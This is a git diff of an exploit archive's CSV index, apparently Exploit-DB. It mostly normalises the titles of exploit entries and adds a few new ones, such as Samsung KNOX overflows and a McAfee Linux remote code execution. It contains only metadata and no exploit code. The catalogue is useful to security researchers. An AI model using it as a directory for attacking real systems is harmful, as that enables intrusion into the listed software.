diff --git a/files.csv b/files.csv index 09fc77181..c2ea9558b 100644 --- a/files.csv +++ b/files.csv @@ -3556,7 +3556,7 @@ id,file,description,date,author,platform,type,port 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 -40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0 +40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0 27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0 28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0 @@ -4120,7 +4120,7 @@ id,file,description,date,author,platform,type,port 32772,platforms/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0 -32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0 +32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Denial of Service",2009-02-12,Romario,linux,dos,0 32815,platforms/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation",2009-02-25,"Chris Evans",linux,dos,0 32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,osx,dos,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 @@ -4235,6 +4235,7 @@ id,file,description,date,author,platform,type,port 33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption",2006-11-10,Intevydis,multiple,dos,0 33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,windows,dos,0 33640,platforms/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,windows,dos,0 +40913,platforms/android/dos/40913.java,"Samsung Devices KNOX Extensions - OTP Service Heap Overflow",2016-12-13,"Google Security Research",android,dos,0 33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' Null Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0 33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (Metasploit)",2014-05-28,j0sm1,multiple,dos,5247 33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0 @@ -5302,8 +5303,10 @@ id,file,description,date,author,platform,type,port 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0 40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos,0 40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0 -40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0 +40905,platforms/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos,0 40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0 +40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0 +40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9673,10 +9676,10 @@ id,file,description,date,author,platform,type,port 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 -6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 +6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 -6026,platforms/linux/remote/6026.pl,"Trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 -6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 +6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Parameter Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 +6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80 @@ -12162,8 +12165,8 @@ id,file,description,date,author,platform,type,port 21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 - Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote,0 21453,platforms/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0 -21466,platforms/windows/remote/21466.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0 -21467,platforms/windows/remote/21467.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0 +21466,platforms/windows/remote/21466.c,"Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0 +21467,platforms/windows/remote/21467.c,"Youngzsoft CMailServer 3.30/4.0 - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0 21468,platforms/windows/remote/21468.pl,"Matu FTP Server 1.13 - Buffer Overflow",2002-05-22,Kanatoko,windows,remote,0 21469,platforms/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 - Full Path Disclosure",2002-05-22,"Matt Moore",windows,remote,0 21470,platforms/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure",2002-05-22,"Matt Moore",windows,remote,0 @@ -14932,7 +14935,7 @@ id,file,description,date,author,platform,type,port 38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0 38764,platforms/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,hardware,remote,443 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 -38797,platforms/php/remote/38797.rb,"Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80 +38797,platforms/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80 38802,platforms/multiple/remote/38802.txt,"Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0 38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 @@ -15151,6 +15154,7 @@ id,file,description,date,author,platform,type,port 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 +40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16875,7 +16879,7 @@ id,file,description,date,author,platform,type,port 2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - (view-sourcecode.php) Local File Inclusion",2006-11-09,ajann,php,webapps,0 2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Inclusion",2006-11-10,Firewall,php,webapps,0 -2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - (printLog.php) SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 +2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,php,webapps,0 2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 @@ -16891,13 +16895,13 @@ id,file,description,date,author,platform,type,port 2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps,0 2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0 -2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 +2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps,0 2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Inclusion",2006-11-13,Firewall,php,webapps,0 -2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 +2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0 @@ -16924,7 +16928,7 @@ id,file,description,date,author,platform,type,port 2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - (src/ark_inc.php) Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 -2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - (pageid) SQL Injection",2006-11-21,Revenge,php,webapps,0 +2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' Parameter SQL Injection",2006-11-21,Revenge,php,webapps,0 2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0 2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0 @@ -17222,7 +17226,7 @@ id,file,description,date,author,platform,type,port 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 -3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - (path_to_folder) Remote File Inclusion",2007-02-07,Denven,php,webapps,0 +3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion",2007-02-07,Denven,php,webapps,0 3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection",2007-02-08,ajann,php,webapps,0 3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps,0 @@ -17444,7 +17448,7 @@ id,file,description,date,author,platform,type,port 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection",2007-04-04,ajann,php,webapps,0 -3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 +3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusion",2007-04-05,bd0rk,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 @@ -19075,84 +19079,84 @@ id,file,description,date,author,platform,type,port 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 -5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 -5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5984,platforms/php/webapps/5984.txt,"Sisplet CMS 2008-01-24 - 'id' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - 'article_ID' Parameter SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0 -5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' SQL Injection",2008-07-01,Kacak,php,webapps,0 -5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - (adid) SQL Injection",2008-07-01,"Hussin X",php,webapps,0 -5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 -5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' SQL Injection",2008-07-01,Houssamix,php,webapps,0 -5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - (boardID) SQL Injection",2008-07-02,haZl0oh,php,webapps,0 -5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - (index.php template) Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 -5993,platforms/php/webapps/5993.txt,"Joomla! Component com_brightweblinks - 'catid' SQL Injection",2008-07-02,His0k4,php,webapps,0 +5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - 'cat_id' Parameter SQL Injection",2008-07-01,Kacak,php,webapps,0 +5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - 'adid' Parameter SQL Injection",2008-07-01,"Hussin X",php,webapps,0 +5989,platforms/php/webapps/5989.txt,"Joomla! Component versioning 1.0.2 - 'id' Parameter SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 +5990,platforms/php/webapps/5990.txt,"Joomla! Component mygallery - 'cid' Parameter SQL Injection",2008-07-01,Houssamix,php,webapps,0 +5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' Parameter SQL Injection",2008-07-02,haZl0oh,php,webapps,0 +5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - 'template' Parameter Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 +5993,platforms/php/webapps/5993.txt,"Joomla! Component Brightcode Weblinks - 'catid' Parameter SQL Injection",2008-07-02,His0k4,php,webapps,0 5994,platforms/php/webapps/5994.pl,"Joomla! Component QuickTime VR 0.1 - SQL Injection",2008-07-02,Houssamix,php,webapps,0 5995,platforms/php/webapps/5995.pl,"Joomla! Component is 1.0.1 - Multiple SQL Injections",2008-07-02,Houssamix,php,webapps,0 -5996,platforms/php/webapps/5996.txt,"phPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0 +5996,platforms/php/webapps/5996.txt,"PHPortal 1.2 - Multiple Remote File Inclusions",2008-07-02,Ciph3r,php,webapps,0 5997,platforms/php/webapps/5997.pl,"CMS WebBlizzard - 'index.php' Blind SQL Injection",2008-07-03,Bl@ckbe@rD,php,webapps,0 -5998,platforms/php/webapps/5998.txt,"phpWebNews 0.2 MySQL Edition - (id_kat) SQL Injection",2008-07-03,storm,php,webapps,0 -5999,platforms/php/webapps/5999.txt,"phpWebNews 0.2 MySQL Edition - (det) SQL Injection",2008-07-03,"Virangar Security",php,webapps,0 -6000,platforms/php/webapps/6000.txt,"pHNews CMS - Multiple Local File Inclusion",2008-07-03,CraCkEr,php,webapps,0 +5998,platforms/php/webapps/5998.txt,"PHPwebnews 0.2 MySQL Edition - 'id_kat' Parameter SQL Injection",2008-07-03,storm,php,webapps,0 +5999,platforms/php/webapps/5999.txt,"PHPwebnews 0.2 MySQL Edition - 'det' Parameter SQL Injection",2008-07-03,"Virangar Security",php,webapps,0 +6000,platforms/php/webapps/6000.txt,"pHNews CMS Alpha 1 - Local File Inclusion",2008-07-03,CraCkEr,php,webapps,0 6001,platforms/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Remote / Local File Inclusion",2008-07-04,DSecRG,php,webapps,0 6002,platforms/php/webapps/6002.pl,"Joomla! Component altas 1.0 - Multiple SQL Injections",2008-07-04,Houssamix,php,webapps,0 6003,platforms/php/webapps/6003.txt,"Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps,0 6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - 'FCKeditor' Session Hijacking / Arbitrary File Upload",2008-07-04,EgiX,php,webapps,0 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,php,webapps,0 -6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0 +6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting",2008-07-05,Cr@zy_King,php,webapps,0 6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Arbitrary File Upload",2008-07-05,PHPLizardo,php,webapps,0 6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,php,webapps,0 -6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0 -6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 -6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0 +6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' Parameter SQL Injection",2008-07-06,"HIva Team",php,webapps,0 +6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - Arbitrary File Upload / Cross-Site Scripting",2008-07-06,"CWH Underground",php,webapps,0 +6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 -6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - (file) Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 -6017,platforms/php/webapps/6017.pl,"Triton CMS Pro - (x-forwarded-for) Blind SQL Injection",2008-07-07,girex,php,webapps,0 -6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0 -6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0 +6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - 'file' Parameter Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 +6017,platforms/php/webapps/6017.pl,"Triton CMS Pro 1.06 - 'x-forwarded-for' Blind SQL Injection",2008-07-07,girex,php,webapps,0 +6018,platforms/php/webapps/6018.pl,"QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0 +6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 -6025,platforms/php/webapps/6025.txt,"Joomla! Component com_content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 +6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' Parameter SQL Injection",2008-07-08,unknown_styler,php,webapps,0 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 -6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 +6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Parameter Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - 'pages_data.php' Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 -6034,platforms/php/webapps/6034.txt,"DreamPics Builder - (page) SQL Injection",2008-07-09,"Hussin X",php,webapps,0 -6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0 -6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 -6037,platforms/php/webapps/6037.txt,"phpDatingClub - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 +6034,platforms/php/webapps/6034.txt,"DreamPics Builder - 'page' Parameter SQL Injection",2008-07-09,"Hussin X",php,webapps,0 +6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' Parameter SQL Injection",2008-07-10,"Hussin X",php,webapps,0 +6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Parameter Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 +6037,platforms/php/webapps/6037.txt,"phpDatingClub 3.7 - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 